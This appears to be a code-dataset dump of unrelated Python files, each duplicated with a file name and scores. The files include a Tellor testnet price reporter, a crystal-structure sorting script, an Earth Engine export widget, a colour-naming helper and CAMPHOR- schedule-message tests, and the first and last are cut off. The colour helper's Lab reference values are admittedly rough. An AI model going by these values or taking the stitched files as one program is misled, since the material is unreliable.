This is needed as Windows uses a different file name hierarchy than the others.
"""
if sys.platform.startswith("win"):
return __COBERTURA_COVERAGE_FILE_NAME
return __COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME
class MainlineExecutor(InProcessExecution):
"""
Class to provide for a local instance of a InProcessExecution class.
"""
def __init__(self, use_module=False, use_main=False):
super().__init__()
self.__use_main = use_main
self.__entry_point = "__main.py__" if use_module else "main.py"
resource_directory = os.path.join(os.getcwd(), "test", "resources")
assert os.path.exists(resource_directory)
assert os.path.isdir(resource_directory)
self.resource_directory = resource_directory
def execute_main(self):
if self.__use_main:
main()
else:
ProjectSummarizer().main()
def get_main_name(self):
return self.__entry_point
def test_get_summarizer_version():
"""
Make sure that we can get information about the version of the summarizer.
"""
# Arrange
executor = MainlineExecutor()
suppplied_arguments = ["--version"]
expected_output = """\
main.py 0.5.0
"""
expected_error = ""
expected_return_code = 0
# Act
execute_results = executor.invoke_main(arguments=suppplied_arguments, cwd=None)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
# pylint: disable=consider-using-with
def setup_directories(
create_report_directory=True,
create_publish_directory=False,
temporary_work_directory=None,
):
"""
Setup a temporary directory, a report directory under it (created if necessary),
and the publish directory (not created by default if necessary).
"""
if not temporary_work_directory:
temporary_work_directory = tempfile.TemporaryDirectory()
report_directory = os.path.join(temporary_work_directory.name, "report")
if create_report_directory:
os.makedirs(report_directory)
publish_directory = os.path.join(temporary_work_directory.name, "publish")
if create_publish_directory:
os.makedirs(publish_directory)
return temporary_work_directory, report_directory, publish_directory
# pylint: enable=consider-using-with | 0.365117 | 0.113432 |
import asyncio
import json
from typing import Any
from typing import Mapping
import requests
from telliot.datafeed.data_feed import DataFeed
from telliot.reporter.base import Reporter
from telliot.submitter.base import Submitter
from telliot.utils.abi import tellor_playground_abi
from web3 import Web3
# TODO: placeholder for actual ConfigOptions clas
temp_config = {"node_url": "", "private_key": ""}
class RinkebySubmitter(Submitter):
"""Submits BTC on testnet.
Submits BTC price data in USD to the TellorX playground
on the Rinkeby test network."""
def __init__(self, config: Mapping[str, str]) -> None:
"""Reads user private key and node endpoint from `.env` file to
set up `Web3` client for interacting with the TellorX playground
smart contract."""
self.config = config
self.w3 = Web3(Web3.HTTPProvider(config["node_url"]))
self.acc = self.w3.eth.account.from_key(config["private_key"])
self.playground = self.w3.eth.contract(
"0x4699845F22CA2705449CFD532060e04abE3F1F31", abi=tellor_playground_abi
)
def tobytes32(self, request_id: str) -> bytes:
"""Casts request_id as bytes32."""
return bytes(request_id, "ascii")
def tobytes(self, value: int) -> Any:
"""Casts value as a bytes array."""
return Web3.toBytes(hexstr=Web3.toHex(text=str(value)))
def build_tx(self, value: float, request_id: str, gas_price: str) -> Any:
"""Assembles needed transaction data."""
request_id_bytes = self.tobytes32(request_id)
value_bytes = self.tobytes(int(value * 1e6))
nonce = self.playground.functions.getNewValueCountbyRequestId(
request_id_bytes
).call()
print("nonce:", nonce)
acc_nonce = self.w3.eth.get_transaction_count(self.acc.address)
transaction = self.playground.functions.submitValue(
request_id_bytes, value_bytes, nonce
)
estimated_gas = transaction.estimateGas()
print("estimated gas:", estimated_gas)
built_tx = transaction.buildTransaction(
{
"nonce": acc_nonce,
"gas": estimated_gas,
"gasPrice": self.w3.toWei(gas_price, "gwei"),
"chainId": 4, # rinkeby
}
)
return built_tx
def submit_data(self, value: float, request_id: str) -> Any:
"""Submits data on-chain & provides a link to view the
successful transaction."""
req = requests.get("https://ethgasstation.info/json/ethgasAPI.json")
prices = json.loads(req.content)
gas_price = str(prices["fast"])
print("retrieved gas price:", gas_price)
tx = self.build_tx(value, request_id, gas_price)
tx_signed = self.acc.sign_transaction(tx)
tx_hash = self.w3.eth.send_raw_transaction(tx_signed.rawTransaction)
_ = self.w3.eth.wait_for_transaction_receipt(tx_hash, timeout=360)
print(f"View reported data: https://rinkeby.etherscan.io/tx/{tx_hash.hex()}")
class IntervalReporter(Reporter):
"""Submits the price of BTC to the TellorX playground
every 10 seconds."""
def __init__(self, datafeeds: Mapping[str, DataFeed], datafeed_uid: str) -> None:
self.datafeeds = datafeeds
self.datafeed_uid = datafeed_uid
self.submitter = RinkebySubmitter(temp_config)
async def report(self) -> None:
"""Update all off-chain values (BTC/USD) & store those values locally."""
"""Submit latest BTC/USD values to the Tellor oracle."""
while True:
jobs = []
for datafeed in self.datafeeds.values():
if datafeed.uid == self.datafeed_uid:
job = asyncio.create_task(datafeed.update_value(store=True))
jobs.append(job)
_ = await asyncio.gather(*jobs)
for uid, datafeed in self.datafeeds.items():
if datafeed.value:
print(f"Submitting value for {uid}: {datafeed.value.val}")
q = datafeed.get_query()
if q is not None:
"""TODO:
- Should encode value using query response type.
- Also use request ID encoded by query
- Decide if these goes here or in submitter.
"""
# TODO: Should use query to encode value. Request ID
# from query is already in bytes. Probably
# be part of submitter
encoded_value = q.response_type.encode(datafeed.value.val)
print(encoded_value) # Dummy print to pass tox style
request_id_str = "0x" + q.request_id.hex()
self.submitter.submit_data(datafeed.value.val, request_id_str)
else:
print(f"Skipping submission for {uid}, datafeed value not updated")
await asyncio.sleep(10)
def run(self) -> None: # type: ignore
"""Used by telliot CLI to update & submit BTC/USD price data to Tellor Oracle."""
# Create coroutines to run concurrently.
loop = asyncio.get_event_loop()
_ = loop.create_task(self.report())
# Blocking loop.
try:
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
loop.close() | src/telliot/reporter/simple_interval.py | import asyncio
import json
from typing import Any
from typing import Mapping
import requests
from telliot.datafeed.data_feed import DataFeed
from telliot.reporter.base import Reporter
from telliot.submitter.base import Submitter
from telliot.utils.abi import tellor_playground_abi
from web3 import Web3
# TODO: placeholder for actual ConfigOptions clas
temp_config = {"node_url": "", "private_key": ""}
class RinkebySubmitter(Submitter):
"""Submits BTC on testnet.
Submits BTC price data in USD to the TellorX playground
on the Rinkeby test network."""
def __init__(self, config: Mapping[str, str]) -> None:
"""Reads user private key and node endpoint from `.env` file to
set up `Web3` client for interacting with the TellorX playground
smart contract."""
self.config = config
self.w3 = Web3(Web3.HTTPProvider(config["node_url"]))
self.acc = self.w3.eth.account.from_key(config["private_key"])
self.playground = self.w3.eth.contract(
"0x4699845F22CA2705449CFD532060e04abE3F1F31", abi=tellor_playground_abi
)
def tobytes32(self, request_id: str) -> bytes:
"""Casts request_id as bytes32."""
return bytes(request_id, "ascii")
def tobytes(self, value: int) -> Any:
"""Casts value as a bytes array."""
return Web3.toBytes(hexstr=Web3.toHex(text=str(value)))
def build_tx(self, value: float, request_id: str, gas_price: str) -> Any:
"""Assembles needed transaction data."""
request_id_bytes = self.tobytes32(request_id)
value_bytes = self.tobytes(int(value * 1e6))
nonce = self.playground.functions.getNewValueCountbyRequestId(
request_id_bytes
).call()
print("nonce:", nonce)
acc_nonce = self.w3.eth.get_transaction_count(self.acc.address)
transaction = self.playground.functions.submitValue(
request_id_bytes, value_bytes, nonce
)
estimated_gas = transaction.estimateGas()
print("estimated gas:", estimated_gas)
built_tx = transaction.buildTransaction(
{
"nonce": acc_nonce,
"gas": estimated_gas,
"gasPrice": self.w3.toWei(gas_price, "gwei"),
"chainId": 4, # rinkeby
}
)
return built_tx
def submit_data(self, value: float, request_id: str) -> Any:
"""Submits data on-chain & provides a link to view the
successful transaction."""
req = requests.get("https://ethgasstation.info/json/ethgasAPI.json")
prices = json.loads(req.content)
gas_price = str(prices["fast"])
print("retrieved gas price:", gas_price)
tx = self.build_tx(value, request_id, gas_price)
tx_signed = self.acc.sign_transaction(tx)
tx_hash = self.w3.eth.send_raw_transaction(tx_signed.rawTransaction)
_ = self.w3.eth.wait_for_transaction_receipt(tx_hash, timeout=360)
print(f"View reported data: https://rinkeby.etherscan.io/tx/{tx_hash.hex()}")
class IntervalReporter(Reporter):
"""Submits the price of BTC to the TellorX playground
every 10 seconds."""
def __init__(self, datafeeds: Mapping[str, DataFeed], datafeed_uid: str) -> None:
self.datafeeds = datafeeds
self.datafeed_uid = datafeed_uid
self.submitter = RinkebySubmitter(temp_config)
async def report(self) -> None:
"""Update all off-chain values (BTC/USD) & store those values locally."""
"""Submit latest BTC/USD values to the Tellor oracle."""
while True:
jobs = []
for datafeed in self.datafeeds.values():
if datafeed.uid == self.datafeed_uid:
job = asyncio.create_task(datafeed.update_value(store=True))
jobs.append(job)
_ = await asyncio.gather(*jobs)
for uid, datafeed in self.datafeeds.items():
if datafeed.value:
print(f"Submitting value for {uid}: {datafeed.value.val}")
q = datafeed.get_query()
if q is not None:
"""TODO:
- Should encode value using query response type.
- Also use request ID encoded by query
- Decide if these goes here or in submitter.
"""
# TODO: Should use query to encode value. Request ID
# from query is already in bytes. Probably
# be part of submitter
encoded_value = q.response_type.encode(datafeed.value.val)
print(encoded_value) # Dummy print to pass tox style
request_id_str = "0x" + q.request_id.hex()
self.submitter.submit_data(datafeed.value.val, request_id_str)
else:
print(f"Skipping submission for {uid}, datafeed value not updated")
await asyncio.sleep(10)
def run(self) -> None: # type: ignore
"""Used by telliot CLI to update & submit BTC/USD price data to Tellor Oracle."""
# Create coroutines to run concurrently.
loop = asyncio.get_event_loop()
_ = loop.create_task(self.report())
# Blocking loop.
try:
loop.run_forever()
except (KeyboardInterrupt, SystemExit):
loop.close() | 0.522933 | 0.213152 |
import logging
import sys
import pandas as pd
import glob
import os
import atools
def main():
if (not len(sys.argv) == 4):
print("""
Usage: sort_structures.py DB_file output_file file_type
DB_file (str) - file with initial list of REFCODEs
output_file (str) - file to output results of sorting to
file_type (str) - set whether to run on PDBs (enter: pdb) or CIFs (enter: cif)
""")
sys.exit()
else:
DB_file = sys.argv[1]
output_file = sys.argv[2]
file_type = sys.argv[3]
# temporary check for non-implemented issue with extractedm.cif cases
# these cases were manually collected
for i in glob.glob(f'*.{file_type}'):
if 'extractedm' in i:
logging.error('This code cannot handled extractedm cases! Please implement them.')
refcodes = sorted([i.rstrip() for i in open(DB_file, 'r').readlines()])
files = [i+'_extracted.'+file_type for i in refcodes]
logging.info(f'> started with: {len(refcodes)} structures to sort.')
if os.path.isfile(output_file):
# read structures already checked to avoid double calculations
OUTDATA = pd.read_csv(output_file)
done_files = list(OUTDATA.file)
logging.info(f'> {len(done_files)} structures already done.')
else:
# write output file
with open(output_file, 'w') as f:
f.write('file,deleted\n')
OUTDATA = pd.read_csv(output_file)
done_files = []
# iterate over files
count = len(done_files)
for file in files:
# skip done structures
if file in done_files:
continue
if os.path.isfile(file):
if file_type == 'cif':
pdb = atools.convert_CIF_2_PDB(file, wstruct=False)
elif file_type == 'pdb':
pdb = atools.check_ASE_handle(file, wstruct=False)
if pdb is None:
logging.warning(f'> ASE failed to load {file}')
# file failed to load in ASE
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
os.remove(file)
else:
logging.info(f'> doing {count} of {len(files)}')
# check if at least one molecule has a pore_diameter_opt > 0.25 angstrom
if atools.check_PDB_for_pore(file=pdb, diam=0.0):
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'N'},
ignore_index=True)
else:
# delete molecule if not
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'Y'},
ignore_index=True)
os.remove(file)
try:
os.remove(pdb)
except FileNotFoundError:
pass
os.remove(pdb.replace('.pdb', '_rebuild.pdb'))
else:
# file missing.
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
# add to done cifs
done_files.append(file)
# update output file
OUTDATA.to_csv(output_file, index=False)
count += 1
remaining = list(OUTDATA[OUTDATA['deleted'] == 'N']['file'])
logging.info(f'> ended with: {len(remaining)} structures.')
if __name__ == "__main__":
# logging.basicConfig(level=logging.DEBUG, format='%(levelname)s-%(message)s')
# logging.debug(f'Debug mode!')
logging.basicConfig(level=logging.INFO, format='')
main() | sort_structures.py | import logging
import sys
import pandas as pd
import glob
import os
import atools
def main():
if (not len(sys.argv) == 4):
print("""
Usage: sort_structures.py DB_file output_file file_type
DB_file (str) - file with initial list of REFCODEs
output_file (str) - file to output results of sorting to
file_type (str) - set whether to run on PDBs (enter: pdb) or CIFs (enter: cif)
""")
sys.exit()
else:
DB_file = sys.argv[1]
output_file = sys.argv[2]
file_type = sys.argv[3]
# temporary check for non-implemented issue with extractedm.cif cases
# these cases were manually collected
for i in glob.glob(f'*.{file_type}'):
if 'extractedm' in i:
logging.error('This code cannot handled extractedm cases! Please implement them.')
refcodes = sorted([i.rstrip() for i in open(DB_file, 'r').readlines()])
files = [i+'_extracted.'+file_type for i in refcodes]
logging.info(f'> started with: {len(refcodes)} structures to sort.')
if os.path.isfile(output_file):
# read structures already checked to avoid double calculations
OUTDATA = pd.read_csv(output_file)
done_files = list(OUTDATA.file)
logging.info(f'> {len(done_files)} structures already done.')
else:
# write output file
with open(output_file, 'w') as f:
f.write('file,deleted\n')
OUTDATA = pd.read_csv(output_file)
done_files = []
# iterate over files
count = len(done_files)
for file in files:
# skip done structures
if file in done_files:
continue
if os.path.isfile(file):
if file_type == 'cif':
pdb = atools.convert_CIF_2_PDB(file, wstruct=False)
elif file_type == 'pdb':
pdb = atools.check_ASE_handle(file, wstruct=False)
if pdb is None:
logging.warning(f'> ASE failed to load {file}')
# file failed to load in ASE
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
os.remove(file)
else:
logging.info(f'> doing {count} of {len(files)}')
# check if at least one molecule has a pore_diameter_opt > 0.25 angstrom
if atools.check_PDB_for_pore(file=pdb, diam=0.0):
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'N'},
ignore_index=True)
else:
# delete molecule if not
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'Y'},
ignore_index=True)
os.remove(file)
try:
os.remove(pdb)
except FileNotFoundError:
pass
os.remove(pdb.replace('.pdb', '_rebuild.pdb'))
else:
# file missing.
OUTDATA = OUTDATA.append({'file': file, 'deleted': 'M'},
ignore_index=True)
# add to done cifs
done_files.append(file)
# update output file
OUTDATA.to_csv(output_file, index=False)
count += 1
remaining = list(OUTDATA[OUTDATA['deleted'] == 'N']['file'])
logging.info(f'> ended with: {len(remaining)} structures.')
if __name__ == "__main__":
# logging.basicConfig(level=logging.DEBUG, format='%(levelname)s-%(message)s')
# logging.debug(f'Debug mode!')
logging.basicConfig(level=logging.INFO, format='')
main() | 0.119987 | 0.156781 |
from geetools import batch
from ipywidgets import *
class toAsset(VBox):
def __init__(self, **kwargs):
super(toAsset, self).__init__(**kwargs)
layout = Layout(width='500px')
self.bapwidget = kwargs.get('bapwidget')
self.root = kwargs.get('root', '')
self.scale = Text(description='scale', value='10')
self.destination = Select(description='Destination',
options=['ImageCollection', 'Folder'],
value='ImageCollection',
layout=layout)
self.folder = Text(description='Path to the ImageCollection',
value=self.root,
layout=layout,
style = {'description_width': 'initial'})
self.nameSub = Text(description='Name of/for the ImageCollection',
layout=layout,
style = {'description_width': 'initial'})
self.name = Text(description='Name for the Image',
layout=layout,
style = {'description_width': 'initial'})
self.exportB = Button(description='Export')
self.bands = SelectMultiple(description='Bands', layout=layout)
self.bands.observe(self.observeBands)
self.exportB.on_click(self.export)
self.destination.observe(self.observeDestination)
self.children = [self.destination, self.folder, self.nameSub,
self.name, self.bands, self.exportB]
def observeDestination(self, v):
if v['name'] == 'value':
value = v['new']
self.folder.description = "Path to the {}".format(value)
self.nameSub.description = "Name of/for the {}".format(value)
def observeBands(self, v):
extra = ['col_id', 'date', 'score']
if v['name'] == 'options':
bands = list(v['new'])
condition = all([b in bands for b in extra])
if not condition:
self.bands.options = bands+extra
def getAssetPath(self):
return "{}/{}".format(self.folder.value, self.nameSub.value)
def getAssetId(self):
return "{}/{}".format(self.getAssetPath(), self.name.value)
def export(self, v=None):
bands = self.bands.value
composite = self.bapwidget.composite().select(bands)
batch.Export.image.toAsset(composite, self.getAssetPath(),
self.name.value, self.destination.value,
float(self.scale.value),
self.bapwidget.site_widget.getRegion()) | geecomposite/widgets/export.py | from geetools import batch
from ipywidgets import *
class toAsset(VBox):
def __init__(self, **kwargs):
super(toAsset, self).__init__(**kwargs)
layout = Layout(width='500px')
self.bapwidget = kwargs.get('bapwidget')
self.root = kwargs.get('root', '')
self.scale = Text(description='scale', value='10')
self.destination = Select(description='Destination',
options=['ImageCollection', 'Folder'],
value='ImageCollection',
layout=layout)
self.folder = Text(description='Path to the ImageCollection',
value=self.root,
layout=layout,
style = {'description_width': 'initial'})
self.nameSub = Text(description='Name of/for the ImageCollection',
layout=layout,
style = {'description_width': 'initial'})
self.name = Text(description='Name for the Image',
layout=layout,
style = {'description_width': 'initial'})
self.exportB = Button(description='Export')
self.bands = SelectMultiple(description='Bands', layout=layout)
self.bands.observe(self.observeBands)
self.exportB.on_click(self.export)
self.destination.observe(self.observeDestination)
self.children = [self.destination, self.folder, self.nameSub,
self.name, self.bands, self.exportB]
def observeDestination(self, v):
if v['name'] == 'value':
value = v['new']
self.folder.description = "Path to the {}".format(value)
self.nameSub.description = "Name of/for the {}".format(value)
def observeBands(self, v):
extra = ['col_id', 'date', 'score']
if v['name'] == 'options':
bands = list(v['new'])
condition = all([b in bands for b in extra])
if not condition:
self.bands.options = bands+extra
def getAssetPath(self):
return "{}/{}".format(self.folder.value, self.nameSub.value)
def getAssetId(self):
return "{}/{}".format(self.getAssetPath(), self.name.value)
def export(self, v=None):
bands = self.bands.value
composite = self.bapwidget.composite().select(bands)
batch.Export.image.toAsset(composite, self.getAssetPath(),
self.name.value, self.destination.value,
float(self.scale.value),
self.bapwidget.site_widget.getRegion()) | 0.755817 | 0.167797 |
from PIL import Image, ImageFilter
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
import json, operator
# close enough for now
lab_def_colors = {
"red": { 'l': 5140.11747498726, 'a': 5854.540388686413, 'b': 4703.999578781808 },
"orange": { 'l': 6808.631086548932, 'a': 1570.9044095408976, 'b': 5774.29818155228 },
"yellow": { 'l': 8359.6222362322, 'a': -1587.0267095039594, 'b': 6911.928415647229 },
"green": { 'l': 4412.98556365553, 'a': -3650.8864478376727, 'b': 3505.0619996219075 },
"blue": { 'l': 3440.99427865288, 'a': 4877.356355591926, 'b': -8151.7744794282125 },
"indigo": { 'l': 2599.7405512221367, 'a': 3626.1956224077812, 'b': -3778.207207219171 },
"violet": { 'l': 6765.249743889395, 'a': 4977.408694893711, 'b': -3226.7699841644912 },
"brown": { 'l': 4029.7637431690864, 'a': 2340.1675308635104, 'b': 3428.617408173726 },
"black": { 'l': 1207.5848657907516, 'a': -0.004845706917500081, 'b': -0.09030751501910572 },
"white": { 'l': 8600.309785328083, 'a': -0.03412277570191691, 'b': -0.6359326166119672 },
"grey": { 'l': 5376.289444627731, 'a': -0.02135483610388178, 'b': -0.39798159786101905 }
}
def blur_and_resize( image ):
image = Image.open( image, 'r' )
image = image.convert( 'RGB' )
image = image.resize( (50, 50) )
image = image.filter( ImageFilter.GaussianBlur( 30 ) )
result = image.convert( 'P', palette = Image.ADAPTIVE, colors = 10 )
result.putalpha( 0 )
return result
def luminance( r, g, b ):
return 0.299 * r + 0.587 * g + 0.114 * b
def check_against_dict( i, dt ):
t = 0
for item in dt:
s = json.loads( dt[ item ] )
if abs( i - s[ 'luminance' ] ) > 100:
t += 1
if t == len( dt ):
return True
return False
def get_colors( image_path ):
try:
modified_image = blur_and_resize( image_path )
color_dict = { }
y = 0
results = { }
for co in modified_image.getcolors( (50 * 50) ):
l = luminance( co[ 1 ][ 0 ], co[ 1 ][ 1 ], co[ 1 ][ 2 ] )
if check_against_dict( l, color_dict ):
color_dict[ y ] = json.dumps(
{ 'luminance': l, 'rgb': { 'red': co[ 1 ][ 0 ], 'green': co[ 1 ][ 1 ], 'blue': co[ 1 ][ 2 ] } } )
for h in lab_def_colors:
c = json.loads( color_dict[ y ] )[ 'rgb' ]
lab = convert_color( sRGBColor( c[ 'red' ], c[ 'green' ], c[ 'blue' ] ), LabColor )
delta_e = delta_e_cie2000(
LabColor( lab_def_colors[ h ][ 'l' ], lab_def_colors[ h ][ 'a' ], lab_def_colors[ h ][ 'b' ] ),
lab )
if results.get( h ) is None or delta_e < results[ h ]:
results[ h ] = delta_e
y += 1
return sorted( results.items(), key = lambda x: x[ 1 ] )
except Exception as e:
print( e ) | color.py | from PIL import Image, ImageFilter
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
import json, operator
# close enough for now
lab_def_colors = {
"red": { 'l': 5140.11747498726, 'a': 5854.540388686413, 'b': 4703.999578781808 },
"orange": { 'l': 6808.631086548932, 'a': 1570.9044095408976, 'b': 5774.29818155228 },
"yellow": { 'l': 8359.6222362322, 'a': -1587.0267095039594, 'b': 6911.928415647229 },
"green": { 'l': 4412.98556365553, 'a': -3650.8864478376727, 'b': 3505.0619996219075 },
"blue": { 'l': 3440.99427865288, 'a': 4877.356355591926, 'b': -8151.7744794282125 },
"indigo": { 'l': 2599.7405512221367, 'a': 3626.1956224077812, 'b': -3778.207207219171 },
"violet": { 'l': 6765.249743889395, 'a': 4977.408694893711, 'b': -3226.7699841644912 },
"brown": { 'l': 4029.7637431690864, 'a': 2340.1675308635104, 'b': 3428.617408173726 },
"black": { 'l': 1207.5848657907516, 'a': -0.004845706917500081, 'b': -0.09030751501910572 },
"white": { 'l': 8600.309785328083, 'a': -0.03412277570191691, 'b': -0.6359326166119672 },
"grey": { 'l': 5376.289444627731, 'a': -0.02135483610388178, 'b': -0.39798159786101905 }
}
def blur_and_resize( image ):
image = Image.open( image, 'r' )
image = image.convert( 'RGB' )
image = image.resize( (50, 50) )
image = image.filter( ImageFilter.GaussianBlur( 30 ) )
result = image.convert( 'P', palette = Image.ADAPTIVE, colors = 10 )
result.putalpha( 0 )
return result
def luminance( r, g, b ):
return 0.299 * r + 0.587 * g + 0.114 * b
def check_against_dict( i, dt ):
t = 0
for item in dt:
s = json.loads( dt[ item ] )
if abs( i - s[ 'luminance' ] ) > 100:
t += 1
if t == len( dt ):
return True
return False
def get_colors( image_path ):
try:
modified_image = blur_and_resize( image_path )
color_dict = { }
y = 0
results = { }
for co in modified_image.getcolors( (50 * 50) ):
l = luminance( co[ 1 ][ 0 ], co[ 1 ][ 1 ], co[ 1 ][ 2 ] )
if check_against_dict( l, color_dict ):
color_dict[ y ] = json.dumps(
{ 'luminance': l, 'rgb': { 'red': co[ 1 ][ 0 ], 'green': co[ 1 ][ 1 ], 'blue': co[ 1 ][ 2 ] } } )
for h in lab_def_colors:
c = json.loads( color_dict[ y ] )[ 'rgb' ]
lab = convert_color( sRGBColor( c[ 'red' ], c[ 'green' ], c[ 'blue' ] ), LabColor )
delta_e = delta_e_cie2000(
LabColor( lab_def_colors[ h ][ 'l' ], lab_def_colors[ h ][ 'a' ], lab_def_colors[ h ][ 'b' ] ),
lab )
if results.get( h ) is None or delta_e < results[ h ]:
results[ h ] = delta_e
y += 1
return sorted( results.items(), key = lambda x: x[ 1 ] )
except Exception as e:
print( e ) | 0.372277 | 0.354573 |
from datetime import datetime
import pytest
import pytz
import textwrap
import app
SCHEDULE_LINK = 'https://camph.net/schedule/'
class TestEvent:
def test_from_json(self):
tz = pytz.timezone("Asia/Tokyo")
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": "https://example.com/",
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url == "https://example.com/"
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": None,
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url is None
def test_from_json_where_time_is_invalid(self):
d = {
"start": "ABCDEF",
"end": "GHIJK",
"url": None,
"title": "Open"
}
with pytest.raises(ValueError):
app.Event.from_json(d)
def test_from_json_where_json_has_missing_key(self):
d = {
"title": "Open"
}
# TODO: we should raise more appropriate exception?
with pytest.raises(KeyError):
app.Event.from_json(d)
def test_generate_day_messages_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 15, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make も利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 16, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make は16:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2020, 4, 12, 15, tzinfo=tz),
end=datetime(2020, 4, 12, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2020, 4, 12, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は15:00〜19:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url="https://example.com/",
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!
https://example.com/""")]
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!""")]
def test_generate_day_messages_with_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 7, 21, tzinfo=tz),
end=datetime(2021, 8, 7, 23, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は17:00〜19:00です。
CAMPHOR- Make は18:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は21:00〜23:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_message_where_title_is_missing(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == []
def test_generate_day_message_where_duplicate_events(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
